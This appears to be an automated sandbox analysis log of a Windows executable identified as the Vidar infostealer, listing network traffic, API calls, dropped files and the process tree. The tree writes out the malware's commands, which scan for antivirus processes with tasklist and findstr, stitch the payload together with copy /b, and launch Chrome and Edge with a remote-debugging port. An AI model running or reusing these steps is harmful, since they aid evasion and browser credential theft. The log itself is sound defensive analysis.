Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49945 version: TLS 1.2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 13_2_009BF7C7
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 13_2_009BF55C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 13_2_009D9FD2

System Summary

barindex
Source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 13_2_009B4763
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 13_2_009A1B4D
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 13_2_009AF20D
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\HonoluluSyndrome Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\OxfordPrintable Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\ViBases Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\ImmediatelyBros Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\TransferRare Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\EscortsNascar Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\NavyPromising Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00968017 13_2_00968017
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094E1F0 13_2_0094E1F0
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095E144 13_2_0095E144
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009622A2 13_2_009622A2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009422AD 13_2_009422AD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097A26E 13_2_0097A26E
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095C624 13_2_0095C624
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009CC8A4 13_2_009CC8A4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097E87F 13_2_0097E87F
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00976ADE 13_2_00976ADE
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B2A05 13_2_009B2A05
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A8BFF 13_2_009A8BFF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095CD7A 13_2_0095CD7A
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0096CE10 13_2_0096CE10
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00977159 13_2_00977159
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00949240 13_2_00949240
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D5311 13_2_009D5311
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009496E0 13_2_009496E0
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961704 13_2_00961704
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961A76 13_2_00961A76
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00967B8B 13_2_00967B8B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00949B60 13_2_00949B60
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00967DBA 13_2_00967DBA
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961D20 13_2_00961D20
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961FE7 13_2_00961FE7
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: String function: 0095FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: String function: 00960DA0 appears 46 times
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: String function: 004062A3 appears 58 times
Source: 25xTHcaF7V.exe Static PE information: invalid certificate
Source: 25xTHcaF7V.exe, 00000000.00000003.2354612974.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 25xTHcaF7V.exe
Source: 25xTHcaF7V.exe, 00000000.00000002.2356614471.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 25xTHcaF7V.exe
Source: 25xTHcaF7V.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 25xTHcaF7V.exe Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: i5pz5p.13.dr Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@88/309@41/19
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B41FA GetLastError,FormatMessageW, 13_2_009B41FA
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 13_2_009A2010
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1A0B AdjustTokenPrivileges,CloseHandle, 13_2_009A1A0B
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 13_2_009ADD87
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 13_2_009B3A0E
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\5HIHIFKR.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Users\user\AppData\Local\Temp\nsyBE7E.tmp Jump to behavior
Source: 25xTHcaF7V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 00000013.00000002.2814868675.0000203400450000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: gdjmozcb1.13.dr, im7gdj5pp.13.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 25xTHcaF7V.exe Virustotal: Detection: 31%
Source: 25xTHcaF7V.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File read: C:\Users\user\Desktop\25xTHcaF7V.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\25xTHcaF7V.exe "C:\Users\user\Desktop\25xTHcaF7V.exe"
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2312,i,10135865500869867964,659012948287771851,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2372,i,6228530341099286433,11719858513677495840,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6980 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2312,i,10135865500869867964,659012948287771851,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2372,i,6228530341099286433,11719858513677495840,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
